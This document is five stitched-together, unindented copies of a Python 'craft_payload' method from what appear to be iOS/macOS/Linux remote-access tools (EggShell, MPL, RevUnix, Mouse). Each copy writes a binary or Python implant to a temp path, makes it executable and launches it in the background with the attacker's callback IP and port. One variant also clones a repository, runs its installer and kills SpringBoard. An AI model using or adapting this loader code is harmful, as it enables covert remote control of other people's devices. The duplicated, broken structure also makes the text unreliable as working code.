def craft_payload(self,device_arch):
# TODO: Detect uid before we send executable
if not self.host:
h.info_error("Local Host is not set")
return
if not self.port:
h.info_error("Local Port is not set")
return
payload_parameter = h.b64(json.dumps({"ip":self.host,"port":self.port,"debug":self.debug}))
if device_arch in self.macos_architectures:
self.verbose_print("Detected macOS")
f = open("resources/mplmacos", "rb")
payload = f.read()
f.close()
#save to tmp,
instructions = \
"cat >/private/tmp/tmpmpl;"+\
"chmod 777 /private/tmp/tmpmpl;"+\
"mv /private/tmp/tmpmpl /private/tmp/mpl;"+\
"/private/tmp/mpl "+payload_parameter+" 2>/dev/null &\n"
return (instructions,payload)
elif device_arch in self.ios_architectures:
self.verbose_print("Detected iOS")
f = open("resources/mplios", "rb")
payload = f.read()
f.close()
instructions = \
"cat >/tmp/tmpmpl;"+\
"chmod 777 /tmp/tmpmpl;"+\
"mv /tmp/tmpmpl /.mpl;"+\
"/.mpl "+payload_parameter+" 2>/dev/null &\n"
return (instructions,payload)
else:
h.info_error("The device is not recognized!")
return
def craft_payload(self, device_arch):
if not self.host:
raise ValueError(
'Server Host IP Not Set. Please Set A Valid Host IP.')
if not self.port:
raise ValueError(
'Server Port Number Not Set. Please Set A Valid Port Number.')
payload_parameter = h.b64(
json.dumps({
"ip": self.host,
"port": self.port,
"debug": 1
}))
if device_arch in self.macos_architectures:
if self.is_multi == False:
h.info_general("Detected MacOS!")
f = open("resources/ruplmacos", "rb")
payload = f.read()
f.close()
instructions = \
"cat >/private/tmp/tmprupl;"+\
"chmod 777 /private/tmp/tmprupl;"+\
"mv /private/tmp/tmprupl /private/tmp/rupl;"+\
"/private/tmp/rupl "+payload_parameter+" 2>/dev/null &\n"
return (instructions, payload)
elif device_arch in self.ios_architectures:
if self.is_multi == False:
h.info_general("Detected iOS!")
f = open("resources/ruplios", "rb")
payload = f.read()
f.close()
instructions = \
"cat >/tmp/tmprupl;"+\
"chmod 777 /tmp/tmprupl;"+\
"mv /tmp/tmprupl /tmp/rupl;"+\
"/tmp/rupl "+payload_parameter+" 2>/dev/null &\n"
return (instructions, payload)
else:
if self.is_multi == False:
if device_arch == "Linux":
h.info_general("Detected Linux")
elif "GET / HTTP/1.1" in device_arch:
raise ValueError(
"RevUnix does not exploit Safari Browser. RevUnix is a payload creation tool.\n Please look at the README.md file"
)
else:
h.info_general(
"Device Unrecognized... \nTrying Python Payload...")
f = open("resources/rupl.py", "rb")
payload = f.read()
f.close()
instructions = \
"cat >/tmp/rupl.py;"+\
"chmod 777 /var/tmp/rupl.py;"+\
"python /tmp/rupl.py "+payload_parameter+" &\n"
return (instructions, payload)
def craft_payload(self, device_arch):
# TODO: Detect uid before we send executable
if not self.host:
raise ValueError('Server host not set')
if not self.port:
raise ValueError('Server port not set')
payload_parameter = h.b64(
json.dumps({
"ip": self.host,
"port": self.port,
"debug": self.debug
}))
if device_arch in self.macos_architectures:
self.verbose_print("Detected macOS")
f = open("resources/mplmacos", "rb")
payload = f.read()
f.close()
#save to tmp,
instructions = \
"cat >/private/tmp/tmpmpl;"+\
"chmod 777 /private/tmp/tmpmpl;"+\
"mv /private/tmp/tmpmpl /private/tmp/mpl;"+\
"/private/tmp/mpl "+payload_parameter+" 2>/dev/null &\n"
return (instructions, payload)
elif device_arch in self.ios_architectures:
self.verbose_print("Detected iOS")
f = open("resources/mplios", "rb")
payload = f.read()
f.close()
instructions = \
"cat >/tmp/tmpmpl;"+\
"chmod 777 /tmp/tmpmpl;"+\
"mv /tmp/tmpmpl /.mpl;"+\
"rm -r mouse;"+\
"git clone https://github.com/entynetproject/mouse.git;"+\
"cd mouse/substrate && chmod +x install.sh && ./install.sh --ignore-package && killall SpringBoard;"+\
"/.mpl "+payload_parameter+" 2>/dev/null &\n"
return (instructions, payload)
else:
if device_arch == "Linux":
self.verbose_print("Detected Linux")
elif "GET / HTTP/1.1" in device_arch:
raise ValueError(
"MPL does not exploit safari, it is a payload loader.")
else:
h.info_general("Device unrecognized, trying python payload...")
f = open("resources/mpl.py", "rb")
payload = f.read()
f.close()
instructions = \
"cat >/tmp/mpl.py;"+\
"chmod 777 /var/tmp/mpl.py;"+\
"python /tmp/mpl.py "+payload_parameter+" &\n"
return (instructions, payload)
def craft_payload(self, device_arch):
# TODO: Detect uid before we send executable
if not self.host:
raise ValueError('Server host not set')
if not self.port:
raise ValueError('Server port not set')
payload_parameter = h.b64(
json.dumps({
"ip": self.host,
"port": self.port,
"debug": self.debug
}))
if device_arch in self.macos_architectures:
self.verbose_print("Detected macOS")
f = open("resources/esplmacos", "rb")
payload = f.read()
f.close()
#save to tmp,
instructions = \
"cat >/private/tmp/tmpespl;"+\
"chmod 777 /private/tmp/tmpespl;"+\
"mv /private/tmp/tmpespl /private/tmp/espl;"+\
"/private/tmp/espl "+payload_parameter+" 2>/dev/null &\n"
return (instructions, payload)
elif device_arch in self.ios_architectures:
self.verbose_print("Detected iOS")
f = open("resources/esplios", "rb")
payload = f.read()
f.close()
instructions = \
"cat >/tmp/tmpespl;"+\
"chmod 777 /tmp/tmpespl;"+\
"mv /tmp/tmpespl /.espl;"+\
"/.espl "+payload_parameter+" 2>/dev/null &\n"
return (instructions, payload)
else:
if device_arch == "Linux":
self.verbose_print("Detected Linux")
elif "GET / HTTP/1.1" in device_arch:
raise ValueError(
"EggShell does not exploit safari, it is a payload creation tool.\nPlease look at the README.md file"
)
else:
h.info_general("Device unrecognized, trying python payload")
f = open("resources/espl.py", "rb")
payload = f.read()
f.close()
instructions = \
"cat >/tmp/espl.py;"+\
"chmod 777 /var/tmp/espl.py;"+\
"python /tmp/espl.py "+payload_parameter+" &\n"
return (instructions, payload)
def craft_payload(self, device_arch):
# TODO: Detect uid before we send executable
if not self.host:
h.info_error("Local Host is not set!")
return
if not self.port:
h.info_error("Local Port is not set!")
return
payload_parameter = h.b64(
json.dumps({
"ip": self.host,
"port": self.port,
"debug": self.debug
}))
if device_arch in self.macos_architectures:
self.verbose_print("Connecting to macOS...")
self.verbose_print("Sending macOS Payload...")
f = open("data/payloads/macos", "rb")
payload = f.read()
f.close()
#save to tmp,
instructions = \
"cat >/private/tmp/mouse;"+\
"chmod 777 /private/tmp/mouse;"+\
"/private/tmp/mouse "+payload_parameter+" 2>/dev/null &\n"
self.verbose_print("Executing macOS Payload...")
return (instructions, payload)
elif device_arch in self.ios_architectures:
self.verbose_print("Connecting to iOS...")
self.verbose_print("Sending iOS Payload...")
f = open("data/payloads/ios", "rb")
payload = f.read()
f.close()
instructions = \
"cat >/tmp/mouse;"+\
"chmod 777 /tmp/mouse;"+\
"mv /tmp/mouse /.mouse;"+\
"/.mouse "+payload_parameter+" 2>/dev/null &\n"
self.verbose_print("Executing iOS Payload...")
return (instructions, payload)
else:
h.info_error("The device is not recognized!")
return